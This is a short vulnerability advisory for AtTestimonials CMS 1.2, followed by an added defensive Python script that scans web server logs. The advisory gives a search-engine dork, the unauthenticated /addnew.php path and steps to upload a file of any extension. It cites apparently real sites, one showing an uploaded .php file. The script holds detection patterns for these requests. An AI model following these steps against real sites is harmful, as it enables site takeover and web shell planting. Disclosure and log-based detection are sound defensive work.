Authored by indoushka

AtTestimonials CMS version 1.2 suffers from a missing authentication vulnerability.

====================================================================================================================================
| # Title : AtTestimonials CMS v1.2 Missing Authentication Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 French V.(Pro) / browser : Mozilla Firefox 66.0.3 (32-bit) |
| # Vendor : http://www.dl.persianscript.ir/script/atmanager-system(PersianScript.ir).zip |
| # Dork : © Copyright 2009 : All Rights Reserved Programmed and Developed by themeflash.com |
====================================================================================================================================

poc :

[+] Dork in Google or another search engine.

[+] The administrative interface appears to be missing authentication.

[+] Use payload : /addnew.php

[+] Add New Testimonials

[+] http://wccpavingcouk/testimonials/addnew.php

[+] Attach a file with any extension

[+] http://dfwcarfixcom/testimonials/upload/084145ahmad.php
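
Added example, not part of the original advisory: a log check a site owner can run to see whether the two behaviours described above (an accepted submission to /addnew.php and a script being served from the /upload/ directory) appear in the web server access log. It assumes Apache/nginx "combined" log format; the sample log lines, IP addresses and file names are constructed, and the function and pattern names are this example's own.

```python
import re
from collections import defaultdict

# Constructed sample lines in "combined" log format (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2019:08:41:02 +0000] "GET /testimonials/addnew.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2019:08:41:45 +0000] "POST /testimonials/addnew.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2019:08:42:10 +0000] "GET /testimonials/upload/084145example.php HTTP/1.1" 200 97 "-" "Mozilla/5.0"
198.51.100.20 - - [12/May/2019:09:00:00 +0000] "GET /testimonials/upload/photo.jpg HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
198.51.100.20 - - [12/May/2019:09:00:05 +0000] "GET /testimonials/index.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD target PROTO", status
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# The page the advisory reports as reachable without a login.
ADMIN_FORM = re.compile(r"/addnew\.php$", re.I)
# Server-side script extensions have no business inside an upload directory.
SCRIPT_IN_UPLOAD = re.compile(r"/upload/[^/]+\.(php\d?|phtml|phar)$", re.I)

def find_suspicious(log_text):
    """Return {client_ip: [(finding, path), ...]} for the advisory's two behaviours."""
    findings = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, _ts, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # ignore any query string
        # On an affected install the form has no login check, so any accepted POST counts.
        if method == "POST" and ADMIN_FORM.search(path) and status.startswith("2"):
            findings[ip].append(("addnew-post-accepted", path))
        # A 200 on a script under /upload/ means an uploaded file was served or executed.
        elif SCRIPT_IN_UPLOAD.search(path) and status == "200":
            findings[ip].append(("script-served-from-upload", path))
    return dict(findings)

if __name__ == "__main__":
    for ip, hits in find_suspicious(SAMPLE_LOG).items():
        print(ip, hits)
```

Matches are leads for review rather than proof of compromise; files found under the upload directory with script extensions should be inspected and the directory configured so that scripts in it are not executed.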


Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================